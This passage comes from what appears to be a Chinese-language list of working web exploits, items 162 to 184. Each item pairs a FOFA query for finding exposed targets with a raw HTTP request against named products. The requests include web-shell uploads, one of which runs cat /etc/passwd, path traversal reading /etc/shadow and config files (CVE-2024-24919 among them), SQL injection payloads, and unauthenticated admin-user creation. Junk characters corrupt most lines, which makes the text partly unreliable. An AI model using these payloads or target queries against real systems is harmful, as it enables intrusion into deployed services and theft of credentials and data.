- ~3 Q) R4 X& L- ] M; uhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
0 Z: H& U' c! q1 \. g' Jxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
4 u! `# s7 t6 V4 v8 [" r! ?( s<soap:Body>, @8 V$ Y1 P9 i& H
<UploadResume xmlns="http://tempuri.org/">& b6 Y6 W3 h1 E+ V- T, f: @( \$ F
<ip>1</ip>
* m6 s V4 M# a) o9 d* W# d<fileName>../../../../dizxdell.aspx</fileName>6 M, W: u" S; e9 l
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>+ S& u; J6 V( s
<tag>3</tag>, }, Z( ?, Q4 R; f6 x) I$ D
</UploadResume>
. Q4 i a- @7 w, `- p$ r</soap:Body>4 k& z2 R0 U! J- V% U5 u+ Q* X' y7 ?% D
</soap:Envelope>+ K$ @! z' D+ Q7 K6 }1 |' W
8 W* B% c0 O; v2 {# ?! Q# N
9 l/ X% V3 V- a1 u- A' {
http://x.x.x.x/dizxdell.aspx
+ @3 K7 U: ]2 U7 v/ R" {+ {; G1 U. N- o6 f% t
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传* g* R* x0 f9 _' t) I# @3 f8 @2 t% g4 I
FOFA: app="和丰山海-数字标牌"6 \6 U. T6 B! T1 A+ u# Q+ U
POST /QH.aspx HTTP/1.1
8 r; y* x0 O. g( {Host: x.x.x.x' A+ x2 F2 l- f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
/ g0 N, u, T4 I+ c+ ?) EConnection: close6 \. B' I3 {7 k6 J
Content-Length: 583
, m3 r5 ?9 n7 a) W3 h3 \Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
* ?( a- C% N, J/ lAccept-Encoding: gzip+ J5 {$ \7 q5 R/ v! ^' M
, b8 ~2 J+ E6 H7 k( [3 y
------WebKitFormBoundaryeegvclmyurlotuey
* e, L4 s8 ?& x5 h6 W6 L8 X! ZContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"1 A: r. A x' U, S U2 W# A
Content-Type: application/octet-stream f' G4 G/ o/ l5 L9 r6 ]& m' j
0 J7 B, z6 N u' C; y) H<% response.write("ujidwqfuuqjalgkvrpqy") %>' m9 a' X6 N- ~" X
------WebKitFormBoundaryeegvclmyurlotuey# Z, k3 F6 |/ w
Content-Disposition: form-data; name="action"
* l. ~ X; K: H& N+ v
$ a8 v( U2 q6 O1 H* Hupload
9 d' w& b3 b; p9 u9 f------WebKitFormBoundaryeegvclmyurlotuey; q B; f& y) E% r4 O7 q+ z: z- a
Content-Disposition: form-data; name="responderId"" ~/ @! [- f' K& b: r
% l+ f6 `+ S x1 x' E M, g
ResourceNewResponder
1 i' u @& n; h, w J8 x------WebKitFormBoundaryeegvclmyurlotuey5 W, Q( y- V M! _5 e
Content-Disposition: form-data; name="remotePath"
2 W1 M: A1 O }/ S" E& b6 z1 z: f* v' ]( c* P# w5 T
/opt/resources
! @) L! X7 L* V------WebKitFormBoundaryeegvclmyurlotuey--4 c) Q: B! X* ~: G0 ~
/ p- ^! w/ @4 r6 ~ W
, R3 n3 @" L2 ^4 ]5 I' ]6 q
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
8 w) T- E3 W- `. o2 b4 h6 o; x5 z. Y: r# Z
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
6 [3 f# M0 [( FFOFA: icon_hash="-795291075"
2 u3 g) H$ p/ }' d) }* k4 y1 yPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.14 w7 h+ W* C) a7 F6 c% Q5 W: [
Host: x.x.x.x# Y7 E3 _! F5 A5 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36* C$ {8 b5 |: N1 H3 {( q d
Connection: close/ b% w$ `* E' z- P8 a/ M
Content-Length: 293
# Y, _$ k: m! W% b7 j# rAccept: */*6 g5 y% O2 p0 ?1 O/ {' o
Accept-Encoding: gzip, deflate
0 B3 r i6 ?) X5 C0 ^- \2 oAccept-Language: zh-CN,zh;q=0.9
1 P `! [" w) Y: ~3 x) Z# T5 CContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
4 l) b! k: T. g6 ?/ j1 [6 |3 K( O" q# s4 f
------iiqvnofupvhdyrcoqyuujyetjvqgocod
. \0 X' U9 G) A# u$ WContent-Disposition: form-data; name="name"- f# }$ e/ Q4 W+ a
( L7 E8 X9 S5 ^6 U8 s1.php5 i" N+ r8 }, J
------iiqvnofupvhdyrcoqyuujyetjvqgocod
( e( p/ }" H) c! Y# Z( MContent-Disposition: form-data; name="upfile"; filename="1.php"$ P, O/ H: n! b- ^4 W! X, t$ T( N4 j
Content-Type: image/jpeg7 E2 `9 a5 ?* @$ I8 l- h8 V
0 m1 n$ W$ m ~8 ~; ]# Nrvjhvbhwwuooyiioxega
7 j, p8 o" H3 `------iiqvnofupvhdyrcoqyuujyetjvqgocod--$ e, a, a/ S2 b. N4 [# p) c) ~9 b
$ N9 h9 S. j7 N& Y
9 n4 u5 U y' V164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传. n& p- G- e& R, g
FOFA: title="智慧综合管理平台登入"
0 h' @; T/ x, R' g7 X; `POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
+ u n! f, S+ ]( F! [7 gHost: x.x.x.x
7 w, x; j9 Z5 G9 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.04 m( ?9 f( C) }9 x8 ~8 S( ]1 U v
Content-Length: 288
$ q" F; l, m9 T5 BAccept: application/json, text/javascript, */*; q=0.016 Q" S1 ?% N1 u$ u P4 V9 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, Q, X, I' u& K* p# G, b
Connection: close
( O1 ?. N' b3 O/ s2 n! b1 iContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl0 C& Q' r- b) G" n* ] o6 d
X-Requested-With: XMLHttpRequest! `4 n" q- \, @. d2 T
Accept-Encoding: gzip
4 P S. {7 K1 p4 n; @/ |+ ?7 G: I% `5 p$ g8 i' ~+ j
------dqdaieopnozbkapjacdbdthlvtlyl3 P# Y9 K. s6 M) z* h
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"1 c2 X$ c. e6 f/ `
Content-Type: image/jpeg1 }: R5 Z- s- e. z$ ^ O) c/ p3 n
# u2 b- v! N* O<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
+ K, k: v4 `. U, t------dqdaieopnozbkapjacdbdthlvtlyl--
N6 d. [' g( s& S5 }
/ p+ R9 l ~: h# w* O x
) Q+ j9 F0 B8 O# rhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
8 J! C: U3 Q. p6 }0 D
+ G% L l, Z o2 {& d165. OrangeHRM 3.3.3 SQL 注入- O6 q& @0 j2 k* H. U
CVE-2024-364282 n- w5 K7 Q+ H& D5 R
FOFA: app="OrangeHRM-产品"' Z5 {1 S- f. M
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
2 ^# F1 g/ H/ ?+ V& Y: Z6 {* z7 ]# N) g ~6 W
6 Y- k7 x# {! l `4 R' ]! Q# v
166. 中成科信票务管理平台SeatMapHandler SQL注入2 f1 }) N- K+ ]# G. Z8 Y8 k
FOFA:body="技术支持:北京中成科信科技发展有限公司"& l( U) Z9 L0 l. s
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1+ [0 f6 Z. X0 [: a; W& Y/ K: t9 d
Host:
0 p; ~! ^1 T* U/ d" A* R9 b) [Pragma: no-cache. o8 U& b/ h6 `8 R
Cache-Control: no-cache
! K) l8 S; r# |$ r+ U# U( v8 JUpgrade-Insecure-Requests: 1
$ T9 E2 r, @- D* R3 ~6 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.366 E9 ^; c7 O1 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: y4 R! h9 y8 {9 ~ u' D
Accept-Encoding: gzip, deflate
E0 [4 A" B4 w5 gAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
9 A6 ?, }; C3 K/ |/ K. ]& ECookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE) E/ \; T& f2 A6 e6 @
Connection: close6 q% x. Z* ^" [/ ?/ X! c
Content-Type: application/x-www-form-urlencoded
+ @ k# H! q( L2 wContent-Length: 89" ]" k* a+ U0 P" U, b
5 o& l+ D: W( g5 f% Z" XMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE9 ?4 E6 {- I6 u8 W, x ?
% L/ N' v. d u7 h( }- v3 E1 I0 Z l9 D8 B/ ]( }! w; ^
167. 精益价值管理系统 DownLoad.aspx任意文件读取2 l9 B) o- k) W" V! r/ {. |
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"6 p+ B* e# q& x0 S5 ]4 e
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.13 W7 j# E c( [' J' e+ [
Host:
L6 Q! l1 ^) r3 W: h! \- m+ I4 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ H" d' K, k1 \' y/ hContent-Type: application/x-www-form-urlencoded3 @1 p0 q& h v! H5 H! T6 h- q
Accept-Encoding: gzip, deflate
7 Q% Q, m: N# l9 P1 s4 A( UAccept: */*# Z) W1 |1 k/ q
Connection: keep-alive
6 n: d3 Z) z& a+ J" G
$ Q, G, C0 f& g- v7 P
0 D6 P5 |! j; p( c& |168. 宏景EHR OutputCode 任意文件读取
8 q9 v; C; z/ k! LFOFA:app="HJSOFT-HCM"
. W t) A" P* b3 s$ ?GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1, A1 H+ d, Y& e
Host: your-ip
, ?2 |+ ^4 k+ s3 Z' tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.364 o( l6 {4 ?$ [+ L
Content-Type: application/x-www-form-urlencoded
- m$ x: W. T4 v. C+ d5 nConnection: close
, a# N3 y7 U0 f) O) L" T$ d) k& x. ^6 T, J3 z1 B
+ h* V7 d1 u' |! m0 G) Z0 x! j3 ~* F ?0 K$ e$ [6 f
169. 宏景EHR downlawbase SQL注入9 f, M# m3 w# {% Z' T
FOFA:app="HJSOFT-HCM"
/ g4 n; ~# u( Q. Y: g9 g, m: \' J: MGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
5 k+ E( i: u- {Host: your-ip$ Q9 q o9 H: _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% @! O' m! y/ r8 D( G
Accept: */*
7 S$ k/ r- N, Z) j8 D! TAccept-Encoding: gzip, deflate" C. a8 ^' Z7 D; M& S4 W2 N
Connection: close
/ t ]4 b2 d# H- |
0 o& W+ o& ]/ R8 _4 s# ^8 r8 `3 C
[( X% I- {5 N3 d) X. `6 {; I" \3 C4 x! }
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
! o( _5 [% F, g. QFOFA:body="/general/sys/hjaxmanage.js"
; f1 t5 K# x; T! fPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
& p3 J* y; I8 G6 ^* E; ~: u0 @Host: balalanengliang
0 g) Q6 n# n% IUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% V2 C5 g/ Q" W4 \' ~! H. p
Content-Type: application/x-www-form-urlencoded$ s) T4 U; m' J# _+ y
: h/ E9 \4 W1 v# S4 {" efilename=../webapps/ROOT/WEB-INF/web.xml
1 P7 {; ]- E0 s+ [1 f1 o9 v6 b- l3 f& Z7 U- K
/ Z& L# l @4 E; d
171. 通天星CMSV6车载定位监控平台 SQL注入9 G$ E6 k! r- m! b# r
FOFA:body="/808gps/"5 p( {) O( }' p! G" f
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1; }. V6 K. k/ Z. e/ ~+ Z0 f% k# c
Host: your-ip
. M$ F. o$ C G! e" Q6 d% l# |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
* K/ u" d; L2 v1 `0 aAccept: */*/ J2 k. V) L; B9 N$ x% C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 ^4 Y) t6 Q% I* b O' u# {8 H
Accept-Encoding: gzip, deflate
# Z6 [5 b, j+ a8 JConnection: close
( k' X3 V% H, U% w. i) L1 ?, A$ D+ K/ v( {7 i) Z. l2 v6 @
8 @3 g" \& P' v$ F3 ]: h
! @/ s* o5 f' | l* D+ b! z172. DT-高清车牌识别摄像机任意文件读取) g1 h# N) G2 u; M9 p& l
FOFA:app="DT-高清车牌识别摄像机"3 C+ _' P8 R! L' a; b. ^& C
GET /../../../../etc/passwd HTTP/1.1
7 e5 K$ y! T7 k# q' gHost: your-ip+ Q& b8 c% ]5 ^3 ?! n# Y! l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* Q- A* @! d& G0 zAccept-Encoding: gzip, deflate( v3 r) M- F2 \
Accept: */*: P3 o1 o/ d6 i7 t3 b5 v! y6 Q: P
Connection: keep-alive3 c6 e& `) b3 d
3 R* |2 O z! F1 A5 [- [( o! J1 j
1 K( ]0 I2 x! [4 f
173. Check Point 安全网关任意文件读取 ^) m& U9 ^- v' Q( Y
CVE-2024-24919
9 w9 o; E, Z* A6 j. j4 oFOFA:app="Check_Point-SSL-Network-Extender"- I+ a L$ {! p, n$ c" f6 h, `
POST /clients/MyCRL HTTP/1.1
) z! E" P) ~; dHost: your-ip
# @/ I% h" G9 h( `! m' `0 {Content-Type: application/x-www-form-urlencoded
: |4 X3 C' K7 R; i. W+ W/ O/ a) e: @6 W ~' H p
aCSHELL/../../../../../../../etc/shadow
( Q# x) F! G2 D3 b" Y% w9 R5 K( U/ u* A; J3 T" Y* I
: z0 ^1 x8 k9 r: Y/ } z
& j3 Y+ k) k* D0 X9 x6 z/ u174. 金和OA C6 FileDownLoad.aspx 任意文件读取
& i% ~: e& ?; GFOFA:app="金和网络-金和OA"
7 ^) d4 v, ?6 U+ m- a. l. k( TGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.12 F4 f+ ~# r- N+ v/ [! ^2 V; a" f0 M
Host: your-ip
; Y- g5 X; J2 H. {( @. NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 F8 Q* s$ l$ Q" v' D! K/ W: SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ M; W5 m# }, T; R) H. w$ aAccept-Encoding: gzip, deflate, br
; ~/ Z4 L/ m2 L+ f- @' J1 xAccept-Language: zh-CN,zh;q=0.9# a k2 C" ], ~5 K$ J* Q) j9 J
Connection: close2 e& w9 T9 ~( }6 x* x, f
) P0 H5 o! N D9 A& T( s
. a+ e! ]+ t3 V) l: ?5 ^1 f) H" i5 F0 I- ]% D; t6 ^0 D' d
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
" v+ [+ K" I; K9 q& T3 j( I* k* {FOFA:app="金和网络-金和OA"6 P2 r5 v$ i7 V
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1- U8 K1 I7 X$ o4 X' O8 U1 D. l
Host:
% W' |1 l Y5 E# L! ~4 g6 zUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ ^' w+ \0 |8 m, L+ ~/ rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
r- s$ d( P, Y- YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- |; r8 q- O4 g; S/ \0 Q
Accept-Encoding: gzip, deflate
) i) l. }5 M6 p2 b$ AConnection: close4 |% x2 j& H) P( v4 i
Upgrade-Insecure-Requests: 1
3 i, T) s' Q% t/ K& u0 ]4 [) C9 a0 L' G4 N* q( }5 ?6 a
2 g7 f6 z3 a( |( u. u
176. 电信网关配置管理系统 rewrite.php 文件上传
+ s7 d7 g A9 M% p+ [! zFOFA:body="img/login_bg3.png" && body="系统登录"
3 M I. O5 S* p8 D* ~4 EPOST /manager/teletext/material/rewrite.php HTTP/1.1
v8 a U. P; m) y( N3 yHost: your-ip% k& ?. M/ ^& \7 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
- q+ L& j; C3 fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
- F1 u. `, d! \$ v0 jConnection: close" r6 k; x, ~; W" k' t) }! D) a/ e! B6 s
# t0 M6 u8 \2 C, u0 a6 ]
------WebKitFormBoundaryOKldnDPT8 U3 m) K' O* u+ _1 A( c
Content-Disposition: form-data; name="tmp_name"; filename="test.php") ~% f) s. s5 L5 ?
Content-Type: image/png
* ]) Y/ O1 H! A: _5 s' A$ v + d3 }: {1 u, f: N5 G4 ?1 ?
<?php system("cat /etc/passwd");unlink(__FILE__);?>2 @, L9 S( i. U" |
------WebKitFormBoundaryOKldnDPT
b( G& L. s7 p- e/ r* o0 nContent-Disposition: form-data; name="uploadtime"5 z. ?& e# s+ J0 N
4 L- B! T" V- d% q; |. ? . V/ p$ H) Z# A; w j
------WebKitFormBoundaryOKldnDPT--6 y; |- ~: T- f
8 c! P; Q+ z; K
" Q0 ?5 j/ }: p2 f7 m6 ~) A+ v% U9 j
177. H3C路由器敏感信息泄露
5 {( K. T2 ]4 D0 z5 ?# R/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg; a$ d" H2 G) ]& ]* T8 [* q; V; W
/userLogin.asp/../actionpolicy_status/../M60.cfg5 J% A- D G9 n W, L
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
$ y. ^/ l: H/ t: ~+ [/userLogin.asp/../actionpolicy_status/../GR5200.cfg
! r. m; w5 d# i/ u% ~" v/userLogin.asp/../actionpolicy_status/../GR3200.cfg3 |7 H$ {1 @/ [* b* S* w& \
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
9 n" G: B* _% m9 X; }" V K/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
+ n8 g( y0 z$ Y0 R" L/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
2 m; y- C) {# d- N; A/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg1 B7 q" k* ?# w) H! s/ ?: t5 k
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg" Q" x- w! A. d# {3 g
/userLogin.asp/../actionpolicy_status/../ER5200.cfg# m9 I. ?! p" p W( h
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
. t: e7 x, L& G) U4 m/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
7 J7 v4 ]5 D8 J A/userLogin.asp/../actionpolicy_status/../ER3260.cfg: \3 Y5 U) \ Y2 A. B. J1 ]
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
! C4 p2 ~" L: g/ ^ @2 I5 u6 ?/userLogin.asp/../actionpolicy_status/../ER3200.cfg8 E: a# s# C2 X6 e# {
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
8 H$ K; j3 a( o1 ~5 }1 X3 Q/userLogin.asp/../actionpolicy_status/../ER3108G.cfg! D% n( d5 `2 A$ ?9 L
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
( Q! r" m4 C; I! A/userLogin.asp/../actionpolicy_status/../ER3100.cfg9 W0 x6 {+ `: H9 ?) S1 A
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg4 ^$ Q- [2 p- n; y5 F& P
2 l8 [) e. z# P5 i, H/ e( k
. o# I1 H$ h' o4 ]3 S178. H3C校园网自助服务系统-flexfileupload-任意文件上传0 ?5 g3 \) m9 ]$ M/ P `, w2 F% P
FOFA:header="/selfservice"( A/ v9 S6 \6 g9 X1 S
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1% x; P4 r/ P! r: d8 W
Host:; A% _; o$ s- n/ g, @, h2 N. s& ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 G) |7 V9 o: HContent-Length: 252) N* a: e6 n$ {/ h0 Y1 h
Accept-Encoding: gzip, deflate7 K! j6 ^" k/ g6 O2 E2 n3 N/ s
Connection: close. D5 [% X( W: ~: t& M/ R- B2 W/ t
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
4 D# @8 P" I+ y-----------------aqutkea7vvanpqy3rh2l( U# ]' Q8 S N, h% c8 @+ F
Content-Disposition: form-data; name="12234.txt"; filename="12234"
4 H% ]9 T& [: T) i0 p1 Z& VContent-Type: application/octet-stream
7 b; ?! {$ a6 k+ e9 Z. dContent-Length: 255. M. H2 r# y' S' E* B2 F
" `+ k# L' `" i0 ~, ?# e( C12234
c8 v. v9 T: ^; V0 @-----------------aqutkea7vvanpqy3rh2l--
4 r5 z0 T9 v- @4 F9 }5 T. a# I) F" g8 d( c( D. b
7 ^7 x, {0 }! F$ |1 e
GET /imc/primepush/%2e%2e/flex/12234.txt
2 _1 h, k+ h: a; k
b9 T) e: ]9 o1 I ]. M
) M& u g9 R1 @" n1 ?/ q+ b* p179. 建文工程管理系统存在任意文件读取) R8 U" `# O6 Q: k( ~# d
POST /Common/DownLoad2.aspx HTTP/1.19 d! t% A- k. n! w+ o
Host: {{Hostname}}
4 y S3 P1 o9 k$ t* z9 sContent-Type: application/x-www-form-urlencoded- k' Z- d. D( r+ y4 N) r: a
User-Agent: Mozilla/5.0: C" m# Z C1 h4 f& @" F
% u: T/ ~( G, @) ^4 Gpath=../log4net.config&Name=' s: M& R4 s% B$ a% J( q
% f9 i! A/ e6 L& R& a0 `9 l
$ I+ F D1 `+ A/ D) Q f180. 帮管客 CRM jiliyu SQL注入7 W/ Q* ?; c9 f0 T5 @ p
FOFA:app="帮管客-CRM"
6 h# j! l- m/ C( |: }- P+ mGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
6 D6 A: x; b- l( @Host: your-ip
4 V2 M, _1 }. t+ f. R, qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ K9 Z4 _4 F% i, z) {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. c3 Y M: U9 o/ u
Accept-Encoding: gzip, deflate$ I$ D4 R3 |( E: j6 q; z
Accept-Language: zh-CN,zh;q=0.95 i; i) n* \- {0 { M4 u
Connection: close1 T5 q J3 c4 L/ W8 I" L
+ E, n/ }6 y% h6 \+ d! a; \4 y+ r( ~9 i' `
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入/ x, U! P N4 _, A7 F
FOFA:"PDCA/js/_publicCom.js"
7 ]9 p/ P& ^+ c8 C+ K# X7 @: hPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.17 Y5 @ A1 v5 n
Host: your-ip
0 }- r+ C8 ? w2 j5 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 C$ M# ]' Y- H5 |+ n- F: U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ O4 v: _! ~8 s5 j# [Accept-Encoding: gzip, deflate, br3 V* b* R5 ^4 T3 L/ }
Accept-Language: zh-CN,zh;q=0.9
7 T! X; F' x: `- b" MConnection: close5 H* D( O- m/ e
Content-Type: application/x-www-form-urlencoded
( `* H. e+ q2 A; R, }1 Q: ]0 E& @
! t# ~; |! e, Q- A& u
% `1 q* ?) F$ m6 N: a% |# Vaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
0 m7 S e# Y; U
* C( h& ]' E W' C8 g: i9 z J
, }7 b1 \$ f [( e182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
3 O1 `. q/ g: V5 p, [! ZFOFA:"PDCA/js/_publicCom.js"
/ }, }9 f9 T' r& E+ f) vPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.18 D6 L/ {1 ?' Z6 d" q
Host: your-ip
$ b% r P! b" N0 ~: y PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
# r7 T+ Q3 p, W1 A" NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" P& l6 r/ R! D1 _! _Accept-Encoding: gzip, deflate, br# E* q; g( ]" Z: f0 u: p5 I4 w
Accept-Language: zh-CN,zh;q=0.9
+ C, p a) @0 J$ D% |3 S- ?Connection: close
7 ]# f: ~9 a4 [" Z. w6 RContent-Type: application/x-www-form-urlencoded
* h: {8 |' x) e$ Z1 s& ~2 I$ M. Z, M" a: {* c; n# r
" Q/ g7 k; u$ N6 O4 D
username=test1234&pwd=test1234&savedays=1
N. C7 N0 z# j3 r2 l+ }6 s- S
% ]2 c5 X9 @/ M a( r) |
1 R/ w3 J/ F+ m1 Y) C @183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入 _" n$ `- z* w% D# Z
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
6 ?* ?8 ^. e1 F% g# E# mGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
2 Z0 n8 O9 _ L. y0 RHost: your-ip
: f9 V# o7 d6 O, FUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ w" l7 `2 E4 {7 E
Accept-Charset: utf-8
0 }6 X$ _9 W: O4 q( q5 }9 S: ]Accept-Encoding: gzip, deflate
8 C% a6 q. x7 \) g- f8 qConnection: close0 y( H: D1 B1 W
Z. W- c9 R' w1 P3 v
% i# W3 f5 j6 g184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加% u/ C2 g' q) P$ h. l
FOFA:server="SunFull-Webs"
) z4 V! x7 n' Z8 j* f$ U1 b2 }POST /soap/AddUser HTTP/1.18 X* d) w& n/ n& X' Y! U$ y
Host: your-ip j5 u3 }& c3 S- e4 h0 \2 l. Q
Accept-Encoding: gzip, deflate
/ B+ t9 g2 @( D$ G% k, EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' r& i: ?1 ~+ PAccept: application/xml, text/xml, */*; q=0.01/ t2 L8 Z. H- F4 j) V% r( M
Content-Type: text/xml; charset=utf-8# u: h: K$ J0 A' k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) h/ f6 {1 x; \; j8 M2 ^+ {+ d$ D
X-Requested-With: XMLHttpRequest
5 i+ V& ^% S+ a: ^
& z n# o9 O7 g$ F! Y, v# c" s" t# w' A- `
